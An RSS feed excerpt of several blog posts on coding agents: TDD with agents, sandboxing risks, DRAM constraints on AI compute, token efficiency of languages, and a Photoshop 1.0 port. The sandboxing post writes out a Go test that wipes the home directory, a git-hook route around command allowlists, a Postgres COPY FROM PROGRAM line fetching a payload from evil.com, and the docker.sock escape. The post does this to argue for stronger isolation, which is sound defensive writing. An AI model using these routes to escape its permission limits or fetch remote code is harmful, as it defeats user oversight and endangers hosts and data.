<p>So now we've established how I used to think about testing. Coding agents have totally changed the ballgame on this. I mentioned e2e testing was slow before - and this is true, but if you're doing things at &quot;human speed&quot; you're probably spending most of your time writing code, and much less waiting for tests to pass (though it does get frustrating when you are stuck in a <em>slow</em> fix test -&gt; wait for tests to pass -&gt; fail -&gt; try again cycle that I'm sure many are all too familiar with on certain projects).</p>
<img src="https://martinalderson.com/img/tdd-time-comparison.png" alt="Before and after: time spent writing code vs waiting for tests" style="display: block; margin: 0 auto;">
<blockquote>
<p>When you're shipping features faster with agents, waiting for tests becomes a much larger proportion of your time.</p>
</blockquote>
<p>I quickly noticed that when I was working with Claude Code, I seemed to be spending nearly <em>all</em> my time waiting for e2e test cases to pass. And worse, the output of these tests (especially browser based) are difficult for LLMs to reason about - LLMs still don't work brilliantly with screenshots, and the test output can be enormous.</p>
<p>This resulted in often comically bad results where it'd read the test failure screenshots, decide it was working brilliantly (when it clearly wasn't!) and then get confused why it was still failing and generally reasoning itself into the nearest psychiatric ward.</p>
<p>Even worse, I was noticing that small regressions were starting to creep in even when the tests did pass. Subtle behaviour and data bugs were starting to mount up, which required me to keep a <em>very</em> close eye on all the changes the agent was building and interrupting it all the time. This was almost certainly confounded with the models being dramatically worse back then, but I was seemingly spending all my time staring at either Claude Code output <em>or</em> test log output.</p>
<h2>Where I'm at now</h2>
<p>After much trial and error I feel I've got into a far better place with this. I'm not sure if you'd call it TDD - but for each 'ticket' I give an agent, I ask it to come up with a testing plan <em>before</em> implementing<sup class="footnote-ref"><a href="#fn2" id="fnref2">[2]</a></sup>. I don't necessarily require it to write the tests first then get them passing, but the idea is me and the agent debate on the best testing approach for a feature ahead of time.</p>
<p>I've leaned far heavier into unit testing and integration testing (on mostly &quot;mocked&quot; infrastructure, vs the e2e approach I discussed before) as well. While I still have a bunch of e2e tests that run on PR, I instruct the agent to just ensure unit and integration tests are passing, and then make a PR which CI will then run e2e against. This seems to strike the right balance - the agent can run the fast tests locally, and then at PR review any failing e2e tests are flagged before merge (which I can then tell the agent to fix). The agent can write all these unit and integration tests in seconds, and it really doesn't matter if the feature flops and needs to be deleted.</p>
<p>The other interesting approach I've done when I do come across a bug is while working on the bug ticket, get the agent to explain <em>why</em> this was missed in our test suite while fixing it. Then add test case(s) <em>specifically</em> for this edge case, covering the reasons outlined before<sup class="footnote-ref"><a href="#fn3" id="fnref3">[3]</a></sup>.</p>
<p>This is obviously just best practice - not some new breakthrough! But in highly iterative products there often just wasn't enough time or resources to add detailed test cases for <em>every single</em> edge case that came up - you'd have to do some level of triage to decide what was worth writing good test cases for.</p>
<p>LLMs clearly change the economics of this, and now even quite simple hobby projects I've made with agents end up with 1,000+ test cases - some of them quite basic, but a lot really running through real use and edge cases.</p>
<p>I now somewhat shudder looking back at quite how fragile some of the human written projects were, test coverage wise.</p>
<h2>The hidden benefits</h2>
<p>The side effect of this is you end up codifying <em>so much</em> behaviour of the app in the tests. The agent <em>has</em> to understand these subtle edge cases, because the tests won't pass otherwise. And as the models and agent harnesses continue to get better and better they figure the inferred meaning of the failing tests far better.</p>
<p>The other surprising benefit is reviewing LLM PRs gets a lot easier. Reviewing the code from an LLM is a lot easier when you know all the tests are passing. Now what I do is start by reviewing the new or updated test files - not the actual implementation code.</p>
<p>This has two benefits. Firstly, if me and the agent did a good job of defining the tests and these pass, I can be pretty confident the code at least does what it should do - and I can focus review time on other things.</p>
<p>Secondly, I can quickly see if the LLM has &quot;cheated&quot; by simplifying/removing the tests. It's a clear giveaway if some test file has suddenly had a few tests removed that probably some weird edge case has come along, and the agent has decided to be lazy and remove it instead. This doesn't happen very often, with some careful instructions in AGENTS.md to tell it <em>not</em> to do this, but it's still another good sanity check.</p>
<p>Everything I read about TDD and testing <em>was</em> correct and I was wrong. However, it required basically infinite close-to-free &quot;labour&quot; in the form of agents for me to get the economics right for most projects.</p>
<p>The results I've got from this approach are genuinely impressive to me. I've built some really complex pipelines that I keep thinking are going to break every time I do a change with an agent, but <em>don't</em>. Maybe I'm just kicking the can further and further down the line, but I haven't hit the 'ceiling' yet.</p>
<p>Turns out the TDD folks were right all along. They just needed a mass-produced army of robotic junior devs to make it practical.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>You can easily go the wrong way with this though. Like everything in life, there are compromises and things sit on a spectrum. I've equally seen products crash and burn because they had <em>far too little</em> test coverage and the product just becomes a huge game of regression whack-a-mole. <a href="#fnref1" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn2" class="footnote-item"><p>A good prompt I've found for this is along the lines of &quot;Please include a section in your plan about how we should test this. Think through common uses and edge cases of this feature, and think the best way to cover these with tests&quot; <a href="#fnref2" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn3" class="footnote-item"><p>I've also found code coverage tools really useful. I've often just set an agent off to improve code coverage of some poorly tested execution branches, again debating with it the best way to go about it. I've also found it good to make it come up with real life examples of how this branch would get triggered to avoid <code>expect(1+1).toBe(2)</code> style assertion tests. <a href="#fnref3" class="footnote-backref">↩︎</a></p>
</li>
</ol>
</section>
]]></content:encoded>
      <link>https://martinalderson.com/posts/turns-out-i-was-wrong-about-tdd/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/turns-out-i-was-wrong-about-tdd/</guid>
      <pubDate>Sun, 25 Jan 2026 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Why sandboxing coding agents is harder than you think</title>
      <description>Permission systems, Docker sandboxing, and log file secrets - why current approaches to securing coding agents fall short and what we might need instead.</description>
      <content:encoded><![CDATA[<p>While I've been blown away by the development in coding agents, I'm starting to get worried there are some quite serious security risks coming from them.</p>
<p>I'm increasingly of the opinion that we need to reimagine the operating system itself a bit to cope with this - very similar to how iOS and Android in the smartphone arena had a very different permission, multitasking and background service approach to conventional &quot;desktop&quot; OSes.</p>
<h2>Permission systems are too naïve</h2>
<p>A common pattern for restricting coding agents is to allow them to only execute certain commands automatically. For example, you may allow it to do a <code>git add</code> and <code>git commit</code> automatically, but restrict <code>git push</code> or <code>git merge</code> operations.</p>
<p>While this makes a lot of sense (and it is a pattern I use a lot), I think there is a serious problem in that somewhat &quot;innocuous&quot; commands like <code>dotnet test</code> or <code>go test</code> can end up doing much more than that.</p>
<p>Imagine a coding agent has the task of fixing a bug. It finds out that disk space is low, so it (wrongly!) decides the best course of action is to clear the users home directory to make space. Now, you have sensibly restricted the coding agent to a very minimal set of commands - perhaps read/write (in the project folder) and <code>go build</code> and <code>go test</code>.</p>
<p>The difficulty is if it wanted to, it could simply create a new go test file:</p>
<pre><code class="language-golang">package main

import (
	&quot;os&quot;
	&quot;testing&quot;
)

func TestCleanup(t *testing.T) {
	homeDir, _ := os.UserHomeDir()
	os.RemoveAll(homeDir)
}
</code></pre>
<p>that does the exact same as <code>rm -rf ~</code>. It can now execute this simply by running <code>go test</code>.</p>
<p>Equally, even <code>git</code> itself can execute arbitrary code via commit hooks. So it could just write to <code>.git/hooks/pre-commit</code> and then do the whitelisted <code>git commit</code> command - to give it full shell access.</p>
<p>These are just examples. I imagine nearly every development tool you use day to day has similar &quot;permission escalation&quot; vectors.</p>
<p>As such I think really <em>any</em> automatic tool execution in a non-sandboxed (e.g. Docker) environment is a big security risk. As models get better and better I think we'll start using these 'bypasses' more and more - not because they are being overtly malicious - but because they just want to get the job done!</p>
<h2>But, Docker has issues too</h2>
<p>I'm still worried that Dockerising the coding agent still has significant risks. Imagine you lock down your Docker container well, and restrict network access. However, you do give it access to your (firewalled) Postgres staging database instance so it can investigate issues/run tests, etc.</p>
<p>All good right? Unfortunately not - it now has arbitrary code and network execution via COPY PROGRAM if you have given it superuser permissions by accident on the database server (I see this quite a lot - often the 'staging' user has <em>way</em> more permissions than it should - it's just staging after all!)</p>
<pre><code class="language-sql">CREATE TABLE temp_payload (line text);
COPY temp_payload FROM PROGRAM 'curl -s http://evil.com/payload.sh'; SELECT * FROM temp_payload;
</code></pre>
<p>Again, this is just an example off the top of my head - with a clever enough model, I'm sure they can figure out weird and wonderful ways to 'exploit' this functionality in any server you give it access to.</p>
<p>Then there is also the problem of Docker itself. Often to run Docker-in-Docker, for example with TestContainers for tests, you spawn the Claude Code instance with</p>
<pre><code class="language-bash">docker run -v /var/run/docker.sock:/var/run/docker.sock
</code></pre>
<p>The problem here is that socket effectively gives it elevated permissions on the host. If it wants, it can just spawn another container through that socket with full filesystem/network access.</p>
<p>My recommendation on this is to instead use 'throwaway' VMs <strong>instead</strong> of Docker if you are concerned about security. This allows the agent to use Docker itself securely in the container without any worries.</p>
<p>There's various micro VM options, but for local development I'd recommend just using <code>libvirt</code> with KVM. If you want faster startup, use <code>virsh save</code> and <code>virsh resume</code> to save a snapshot to an image at boot and then use that as the basis for each VM you want to spin up. On a fast machine with decent NVMes this takes seconds - it's not obviously slower than Docker in my experience, but with a far better security boundary if you need the agent to use Docker. This, however, does not rule out privilege escalation via a remote host it has access to.</p>
<h2>Secrets in log files</h2>
<p>Even a perfectly sandboxed agent creates a new problem: its logs. While the example above is really about protecting against &quot;accidental&quot; over eagerness from agents vs outright bad actors, I do have serious concerns about the log files that agents like Claude Code generate <em>and</em> most likely store on their end for audit and diagnostic purposes (even if not for training!).</p>
<p>It occurred to me recently while I was building a bunch of <a href="https://martinalderson.com/posts/why-im-building-my-own-clis-for-agents/">CLIs</a> that I was pasting secrets in by accident more times than I'd like to admit. It's very easy to just copy and paste setup instructions and accidentally include a secret in it.</p>
<p>This got me thinking - even being very careful, it's hard to avoid this completely. For example, a program crashes and in the stack trace accidentally leaks env variables. Or the agent... just reading your $ENV vars to diagnose a problem. Plus enabling trace logs often reveal secrets that you probably don't want to expose.</p>
<p>These all end up in Claude Code's log directory and (I assume) in Anthropic's servers.</p>
<p>As such I think these log files are becoming extremely high value targets - why bother doing complex attacks to grab secrets when you can just grab these log files and figure out the secrets from there.</p>
<p>What would be great would be some auto-secret scrubbing from the log files (detecting common patterns and redacting them at a minimum), plus encrypting the local log files. Interestingly, Claude Code tells me off when I accidentally put a secret in the chat, but it doesn't tell itself off when it reads one by accident.</p>
<h2>Vulnerability hunting at industrial scale</h2>
<p>This is probably the one that concerns me the most. I found out a while ago it was <em>trivial</em> for LLMs to find exploits in &quot;niche&quot; open source projects I use. I didn't go too deep in this but it was very easy for it to find a DoS attack vector with virtually no effort or even rudimentary knowledge of the codebase from my part.</p>
<p>Combined with their excellent skills in reverse engineering code, this is a true systemic risk that needs serious attention.</p>
<p>I suspect bad actors already are using agents to find hundreds (thousands or more?) of vulnerabilities in open (and closed) source servers. The real risk imo isn't really from popular servers like sshd or nginx, but the huge long tail of weird and wonderful servers and applications.</p>
<p>A lot of these (unlike say nginx) have very little attention on them. This in the past did mean that it was nearly pointless for bad actors to find vulnerabilities in them - why spend effort on a small project that maybe has a few hundred servers total when you can focus on higher value targets.</p>
<p>There was a <a href="https://arxiv.org/abs/2512.09882">very interesting study</a> done showing that in some examples, agents were outcompeting humans in many pentesting tasks. This is a side effect of making models great at coding - they also become great at finding security weaknesses.</p>
<p>Now I can definitely see a world where this long tail with agents becomes much more attractive. 100 exploits in 100 small apps = 10,000 targets.</p>
<p>Equally agentic tools are going to be great at <em>fixing</em> these issues, but there's definitely going to be a lag between this proliferation of attacks and these tools being patched (if they even have a maintainer).</p>
<p>The asymmetry has flipped. Finding vulnerabilities used to be expensive and exploiting them was cheap. Now both are cheap.</p>
<p>Fundamentally agents are a new 'category' of software execution that I don't think maps well to most OS models. We tend to think of code as either malicious or trusted. Agents are neither. That's the problem.</p>
]]></content:encoded>
      <link>https://martinalderson.com/posts/why-sandboxing-coding-agents-is-harder-than-you-think/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/why-sandboxing-coding-agents-is-harder-than-you-think/</guid>
      <pubDate>Mon, 19 Jan 2026 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>The Coming AI Compute Crunch</title>
      <description>Why DRAM shortages, not capital, will define AI infrastructure growth through 2027</description>
      <content:encoded><![CDATA[<p>There has been so much written about the &quot;unsustainable&quot; AI capex recently. Thinking through this recently it occurred to me this is potentially the wrong way to think about it, and it's actually more likely from my research we're going to experience a very significant crunch on compute in the coming years.</p>
<p>I think this is very pertinent as over the holiday season it seems nearly <em>everyone</em> who works in software engineering has finally figured out quite how good coding agents with the latest models have got - and really validates my thesis that as models continue to improve token consumption is going to explode.</p>
<h2>My token consumption journey</h2>
<p>Like I'm sure many of my readers, I was certainly an early adaptor of LLMs, especially once ChatGPT came out. I'd ask questions, get it to help with writing and various other simple (in hindsight) tasks - but probably no more than a few times a day. I'd estimate my token consumption around 5-10k tokens/day back then.</p>
<p>Once GPT4 (and later, Sonnet 3.5) came out, the &quot;knowledge&quot; of the models increased dramatically. This dramatically increased my token consumption - I basically always had one screen open with a chat UI, constantly asking questions and asking for help. I never really got into the VSCode Copilot 'autocomplete' workflow that many did - I found it distracting. But there was certainly an awful lot of copying and pasting code from one browser window to my IDE. I'd guess there was likely a 5 fold increase in my daily token consumption (and I started hitting free plan usage limits <em>hard</em>, purchasing what would be come one of many paid subscriptions for these tools).</p>
<p>Less than a year ago I started using Claude Code - I must admit like a lot of people I was highly sceptical of the concept at first. Within a few months I rarely opened my IDE and my token consumption absolutely skyrocketed - so much so within a week I was on the Max plans from Anthropic.</p>
<p>Now with Opus 4.5 it's increased even further. I'm far more confident leaving agents churning through stuff without constantly <a href="https://martinalderson.com/posts/are-we-in-a-gpt4-style-leap-that-evals-cant-see/">babysitting them</a>, working in parallel, using millions upon millions of tokens. I've also started using them for more and more non-software engineering tasks, <a href="https://martinalderson.com/posts/why-im-building-my-own-clis-for-agents/">using CLIs</a> to wrap loads of the products I use on a regular basis to give them an agentic compatible experience.</p>
<p>While I don't have detailed stats, I'd estimate in around 3 years my daily token consumption has increased 50x. And this <em>doesn't even</em> count the 'embedded' AI use I'm using in other products and not seeing (eg. Google AI overviews, or various other AI integrations, which are currently of questionable utility in a lot of cases).</p>
<h2>This requires enormous amounts of compute</h2>
<p>All these tokens need to be processed on a GPU or TPU to run it through the model. As such we're witnessing currently one of the largest rollouts of infrastructure in human history, with datacentres popping up to service this huge (and growing) demand.</p>
<p>Keep in mind also that the number of people using LLMs has exploded in step - most stats show around 1 billion active LLM users at the time of writing. While most of these won't be using the millions of tokens like me and many other software engineers, as the technical complexity of building and running agentic workflows drop I'm sure they'll start consuming more and more tokens individually.</p>
<p>This has led to huge increases in capex, especially from the hyperscalers of AWS, Azure and GCP. I would add that the hyperscalers were <em>already</em> spending many tens of billions of dollars each on capex before AI to service non-LLM workflows.</p>
<p>Over the past 6 months this has reached fever pitch, at one point with it seeming that every <em>day</em> another $10bn+ infrastructure deal was done by one of the companies involved.</p>
<p>This then caused an (understandable) amount of questioning from the media and financial analysts, asking exactly how this enormous capex bill could be spent, especially pointing out some of the strange looking circular financing deals. It's important to note that asset based lending from vendors is <em>very</em> common in capex heavy industry (Ford famously makes more money from asset financing than building cars), but it's certainly unprecedented at this level.</p>
<h2>Where the narrative breaks down</h2>
<p>So we've established that token consumption per user is exploding, and equally the number of users is also growing extremely rapidly, and there's $100bns of &quot;committed&quot; capex to build out the infrastructure to support this.</p>
<p>Where I think this starts diverging is the actual <em>ability</em> to deploy that capital. It's one thing proposing $500bn of infrastructure spending in the oval office, quite another to turn that into the physical infrastructure, power it and get it online and supporting the enormous token demand.</p>
<p>The first obvious constraint is electrical power - most countries already have a significant lack of grid capacity. That's certainly a major factor, but has been somewhat mitigated in the short term at least by these datacentres deploying behind the meter (not grid) gas turbines. Especially in major gas producing regions like Texas there is (was) considerable spare gas pipeline capacity, even if there wasn't high voltage transmission availability. This has led to a subsequent shortage of gas turbine gensets, but that's a story for another day.</p>
<p>The bigger issue in my opinion is much harder to work around - RAM. If you've been in the market for a new computer, you may have noticed the breathtaking increases in computer memory prices. OpenAI is rumoured to have bought 40% of the entire world's DRAM supply. We're starting to see the supply chains buckle under the demand - and a lot of the DRAM supply is locked up in long term supply contracts, so once they start rolling over in the coming months and years you'll likely see far more consumer impact.</p>
<p>But what really grabbed my attention is this note from Macquarie pointing out the current supply of DRAM will only support the rollout of 15GW of AI infrastructure.</p>
<img src="https://martinalderson.com/img/dram-ai-infrastructure-constraint.png" alt="DRAM supply constraints on AI infrastructure" style="max-width: 400px; display: block; margin: 0 auto;">
<p>This places a really hard constraint on how much capacity can be built. Regardless if the AI companies/hyperscalers buy from Nvidia, AMD or like in Google's case, build their own TPUs with Broadcom - they all require HBM DRAM memory to go into the finished product.</p>
<p>And even worse, it's very difficult to ramp DRAM capacity quickly. Building new fabs for high end DRAM takes years - and it's likely a lot of the equipment <em>they</em> need to build is in very short supply, with a shortage of lithography equipment. High end DRAM (like HBM3 and the upcoming HBM4) requires EUV equipment which only one<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup> Dutch company makes.</p>
<p>Running some napkin maths on this, 7.5GW is roughly the power consumption of 2 million GB200s chips, which might deliver something on the order of 500M tok/s combined on frontier models (this part gets difficult to estimate accurately with speculative decoding, batch efficiency and ratio of prefill to inference).</p>
<p>This would &quot;only&quot; support the growth of <sup class="footnote-ref"><a href="#fn2" id="fnref2">[2]</a></sup>~30m &quot;hardcore&quot; agentic users using a million tokens a day for a year (assuming 7.5GW deployment in 2026 and another 7.5GW deployment in 2027, to get the 15GW the research note points out).</p>
<p>Given that models and use cases are appearing all the time (and will continue to), I think globally that is very likely to be breached. Keep in mind this is assuming all the compute is going to agentic inference - we also have hugely compute hungry video, audio and 'world' models that will be competing for that too, plus training runs and other LLM workflows.</p>
<p>Even worse, prompt caching (which makes a lot of agentic workflows economically viable) is extremely RAM intensive. The memory crunch hits exactly the use case of the highest demand the hardest.</p>
<h2>What's likely to happen</h2>
<p>Simple economics would tell us if demand rises and supply doesn't keep pace, prices will increase. In a <a href="https://martinalderson.com/posts/are-openai-and-anthropic-really-losing-money-on-inference/">previous blog post</a> I estimated that current AI usage actually <em>is</em> very profitable (on a pure hardware/infrastructure level). AWS did push out a significant price increase recently -<a href="https://www.theregister.com/2026/01/05/aws_price_increase/"> raising the price</a> of their GPU rental by 15%.</p>
<p>Having said that, there is still enormous pressure to maintain market share from the various frontier labs. I can't see that changing and I strongly suspect that they'll be significant resistance to raise prices substantially - the barrier of switching between providers is quite low.</p>
<p>What I do think is going to happen more and more is far more dynamic inference pricing, with 'off peak' times being <em>significantly</em> cheaper than when demand is at its highest through the day. I can also see free plans becoming far less generous than they currently are while they try and build up capacity in the background.</p>
<p>I'm sure this is already driving model efficiency research - a small percentage increase in tok/s throughput on hardware can drive enormous commercial value. And I wonder if a lot of the time that's currently being spent making <em>better</em> models and harnesses switches to <em>more efficient</em> models as we go through to 2027, until DRAM capacity ramps.</p>
<p>There's a couple of wildcards too - maybe we will see frontier labs reserving entire <em>models</em> for their own usage rather than giving them out to end customers to build upon. For example, Google reserving a future Gemini model <em>just</em> for their own products like agentic Gmail or AI overviews.</p>
<p>Or someone comes up with a better memory architecture - totally sidestepping these constraints. There will be unbelievable commercial value in coming up with this - and I think Nvidia's recent $20bn <s>acquisition</s> <a href="https://groq.com/newsroom/groq-and-nvidia-enter-non-exclusive-inference-technology-licensing-agreement-to-accelerate-ai-inference-at-global-scale">non exclusive inference licensing deal</a> with Groq really points in this direction (Groq's memory architecture doesn't use HBM DRAM - it uses SRAM - but diving into this is an article for another day).</p>
<p>Regardless, I am not seeing the risk that we <em>overbuild</em> AI capacity right now. Regardless of the deals done and non-binding trillion dollar commitments signed, the DRAM shortage is likely to define the industry in the next few years.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>I'd really recommend reading <a href="https://en.wikipedia.org/wiki/Chip_War">Chip War by Chris Miller</a> if you're interested in the story behind this market. It's a fascinating read and a really accessible overview to the history and dynamics of this vital industry that has got very little attention until now. <a href="#fnref1" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn2" class="footnote-item"><p>I'm assuming a significant efficiency drop-off on this because demand isn't steady over the course of a day - you need substantial spare capacity to ensure the service doesn't degrade at &quot;peak times&quot; <a href="#fnref2" class="footnote-backref">↩︎</a></p>
</li>
</ol>
</section>
]]></content:encoded>
      <link>https://martinalderson.com/posts/the-coming-ai-compute-crunch/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/the-coming-ai-compute-crunch/</guid>
      <pubDate>Sat, 10 Jan 2026 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Which programming languages are most token-efficient?</title>
      <description>Comparing token efficiency across 19 popular programming languages using RosettaCode data - from Clojure to C, there&#39;s a 2.6x difference.</description>
      <content:encoded><![CDATA[<p>I've been trying to think through what happens to programming languages and tooling if humans are increasingly no longer writing it. I wrote about how good agents are at <a href="https://martinalderson.com/posts/ported-photoshop-1-to-csharp-in-30-minutes/">porting code recently</a>, and it got me thinking a bit more about what constraints LLMs have vs humans.</p>
<p>One of the biggest constraints LLMs have is on context length. This is a difficult problem to solve, as memory usage rises significantly with longer context window in current transformer architectures. And with the current memory shortages, I don't think the world is drowning in memory right now.</p>
<p>As such, for software development agents, how 'token efficient' a programming language actually could make a big difference and I wonder if it starts becoming a factor in language selection in the future. Given a significant amount of a coding agents context window is going to be code, a more token efficient language should allow longer sessions and require fewer resources to deliver.</p>
<p>We've seen <a href="https://toonformat.dev/">TOON</a> (an encoding of JSON to be more token efficient), but what about programming languages?<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup></p>
<blockquote>
<p><strong>Update:</strong> I've since followed this up with a comparison of <a href="https://martinalderson.com/posts/which-web-frameworks-are-most-token-efficient-for-ai-agents/">which web frameworks are the most token efficient for AI agents</a> - it turns out frameworks matter even more than languages.</p>
</blockquote>
<h2>Methodology</h2>
<p>I came across the <a href="https://rosettacode.org/wiki/Rosetta_Code">RosettaCode</a> project while doing some research thinking around this. It describes itself a programming chrestomathy site (which I love, by the way). It has over a thousand programming 'tasks' that people build in various languages. It has contributions in nearly 1,000 different programming languages.</p>
<p>I found a <a href="https://github.com/acmeism/RosettaCodeData">GitHub mirror</a> of the dataset, so grabbed Claude Code and asked it to make a comparison of them, using the Xenova/gpt-4 tokenizer from Hugging Face - which is a community port of OpenAI's GPT4 tokenizer.</p>
<p>I then told Claude Code to suggest a selection of the most popular programming languages, which roughly matches my experience, and then find tasks that had solutions contributed in <em>all</em> 19 of these languages, and then ran them through the tokenizer. I didn't include TypeScript because there were very few tasks in the Rosetta Code dataset.</p>
<blockquote>
<p>There are many, many potential limits and biases involved in this dataset and approach! It's meant as a interesting look at somewhat like-for-like solutions to some programming tasks, not a scientific study.</p>
</blockquote>
<h2>Results</h2>
<img src="https://martinalderson.com/img/token-efficiency-chart.png" alt="Token efficiency comparison across programming languages" class="no-border">
<blockquote>
<p><strong>Update:</strong> A lot of people asked about APL. I reran on a smaller set of like-for-like coding tasks - it came 4th at 110 tokens. Turns out APL's famous terseness isn't a plus for LLMs: the tokenizer is badly optimised for its symbol set, so all those unique glyphs (⍳, ⍴, ⌽, etc.) end up as multiple tokens each.</p>
</blockquote>
<blockquote>
<p><strong>Update 2:</strong> A reader reached out about J - a language I'd never heard of. It's an array language like APL but uses ASCII instead of special symbols. It dominates at just 70 tokens average, nearly half of Clojure (109 tokens). Array languages can be extremely token-efficient when they avoid exotic symbol sets. If token efficiency turns out to be a key driver, this is perhaps a very interesting way for languages to evolve.</p>
</blockquote>
<p>There was a very meaningful gap of 2.6x between C (the least token efficient language I compared) and Clojure (the most efficient).</p>
<p>Unsurprisingly, dynamic languages were much more token efficient (not having to declare <em>any</em> types saves a lot of tokens) - though JavaScript was the most verbose of the dynamic languages analysed.</p>
<p>What did surprise me though was just <em>how</em> token efficient some of the functional languages like Haskell and F# were - barely less efficient than the most efficient dynamic languages. This is no doubt to their very efficient type inference systems. I think using typed languages for LLMs has an awful lot of benefits - not least because it can compile and get rapid feedback on any syntax errors or method hallucinations. With LSP it becomes even more helpful.</p>
<p>Assuming 80% of your context window is code reads, edits and diffs, using Haskell or F# would potentially result in a significantly longer development session than using Go or C#.</p>
<p>It's really interesting to me that we are in this strange future where we have petaflops of compute but code verbosity of our 'small' context windows actually might matter. LLMs continue to break my mental model of how we should be looking at software engineering.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>OpenAI has a simple tokenizer you can play around with <a href="https://platform.openai.com/tokenizer">here</a>. Many people have wrote about how tokenization works - there's a good introduction <a href="https://christophergs.com/blog/understanding-llm-tokenization">here</a> if you'd like to learn more. The key thing is that it doesn't map <em>at all</em> to character usage in bytes. Common words and phrases can be 1 token for the entire word, but certain symbols and sequences can be one token per character. <a href="#fnref1" class="footnote-backref">↩︎</a></p>
</li>
</ol>
</section>
]]></content:encoded>
      <link>https://martinalderson.com/posts/which-programming-languages-are-most-token-efficient/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/which-programming-languages-are-most-token-efficient/</guid>
      <pubDate>Thu, 08 Jan 2026 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>I ported Photoshop 1.0 to C# in 30 minutes</title>
      <description>Using Claude Code to port 120k lines of Pascal and 68k assembly to modern C# - and what this means for cross-platform development</description>
      <content:encoded><![CDATA[<p>Over the holidays I saw a link to the original <a href="https://computerhistory.org/blog/adobe-photoshop-source-code/">Photoshop 1.0 source code</a> from 1990. Of course this gave me the idea - how well could Claude Code do at porting it to 'modern' cross platform C# code?</p>
<p>And, more seriously, what does this tell us about the future of software ecosystems?</p>
<h2>Turns out agents can do less popular languages</h2>
<p>A lot of the criticism from software developers I hear is that LLMs are only good at certain languages because they are mostly trained on that. This is in my opinion a gross simplification - the LLMs can start to understand general patterns of software development and the logic that goes along with that and don't need to have many examples to work with.</p>
<p>Photoshop 1.0 is ~100k lines of Pascal and ~20k lines of 68k Assembler.</p>
<p>I definitely think Pascal and 68k assembly is <em>not</em> topping any popularity charts these days. And I doubt there is much training data for the LLMs to work from in comparison - I could find low hundreds of repos <em>total</em> with some Google searches for 68k assembly on GitHub.</p>
<p>I made a folder for Claude Code to work in, grabbed the zip with <code>curl</code> and told it to unzip the original source code and explore the original 1990 codebase and make a plan to port it to C#.</p>
<p>It gave me a few options of frameworks to use for cross platform UIs with .NET (it's been a while since I've developer a cross platform GUI in .NET!), and I decided to go with Avalonia which allows you to build apps that target Windows, Mac and Linux. I've actually never used Avalonia before so I definitely didn't guide the approach much.</p>
<p>After a few subagents explored the codebase and wrote a <em>very</em> detailed  plan, we delved into implementation. I decided to suggest parallel subagents to implement it, which actually worked extremely well.</p>
<img src="https://martinalderson.com/img/photoshop-port-subagents.png" alt="Claude Code subagents working on the port" class="no-border">
<h2>30 minutes later, a somewhat usable port</h2>
<img src="https://martinalderson.com/img/photoshop-port-running.png" alt="Photoshop 1.0 running in C# on macOS" style="max-width: 70%; display: block; margin: 20px auto;">
<p>Amazingly 30 minutes later I had a running version of the app, running in C# on modern macOS. I didn't provide any feedback to the agent(s) - my lack of Pascal and 68k knowledge really wouldn't have helped it much.</p>
<img src="https://martinalderson.com/img/photoshop-port-ui.png" alt="The ported UI" class="no-border">
<p>There's a few bugs here and there - it's definitely not finished - but most of the functionality works and I have no doubt if I had a few more hours I could get a pretty solid port. It did &quot;cheat&quot; in some ways by using SkiaSharp (a drawing library), but the original Mac version used QuickDraw which is also an abstraction <code>¯\_(ツ)_/¯</code>. It did, however, port the core concepts faithfully, along with the filter algorithms.</p>
<h2>Cool party trick. But what does this mean?</h2>
<p>I think this has a lot of implications past toy projects like this.</p>
<p>Firstly, over my career I've had to &quot;rescue&quot; a lot of projects that started out in one language that really struggled to scale. A common issue I've came across is building a project in, for example, Python which with time ends up really struggling with very high throughput.</p>
<p>This has then led to a hasty port of 'hot path' API endpoints/service to a language more suited to high throughput like Go or C# to try and cope with demand spikes better.</p>
<p>I think coding agents would <em>already</em> make this process far easier. I suspect this will become an emerging pattern - build the MVP/1.0 of your product in your preferred language (I think Django has one of the best developer experience out there, FWIW), then use agents to quickly port it into a high(er) performance language <em>if</em> you start experiencing scale problems.</p>
<h2>The end of cross platform apps?</h2>
<p>Ironically, despite building this port in a cross platform UI framework, it occurred to me that one of the biggest benefits of this could be building fully native apps and UIs for each platform you target with no 'compromises'.</p>
<p>I spent a near decade building mobile apps in Xamarin (RIP) and React Native, and while they delivered a pretty polished experience with enough time and care, there was definitely quite a few drawbacks - especially with React Native's very single threaded approach.</p>
<p>I'd always really liked the vision of a cross platform app for mobile, as often with doing separate &quot;native&quot; apps for iOS and Android you really needed two teams, and inevitably the apps started diverging. In the end for many apps the compromises of a cross platform framework made a lot of sense for the resource and coordination efficiencies.</p>
<p>But now, I can easily see teams picking a 'lead' language like Swift for iOS, then having a code agent periodically port it all to Kotlin for Android (or visa versa). I think this is going to be a game changer for mobile teams - especially those struggling with limitations of cross platform apps or that don't have the experience in both ecosystems. With correct prompting I think it would be quite possible to end up with the best of both worlds - platform specific features but a rapidly iterating 'core' of the app that is kept in sync automatically by the agent.</p>
<h2>Security</h2>
<p>Equally I'm extremely bullish on the future of Rust and other memory safe alternatives to C/C++. There's been <em>far</em> too many security issues caused by C/C++ and I think agents can play a big part in accelerating the transition away from it.</p>
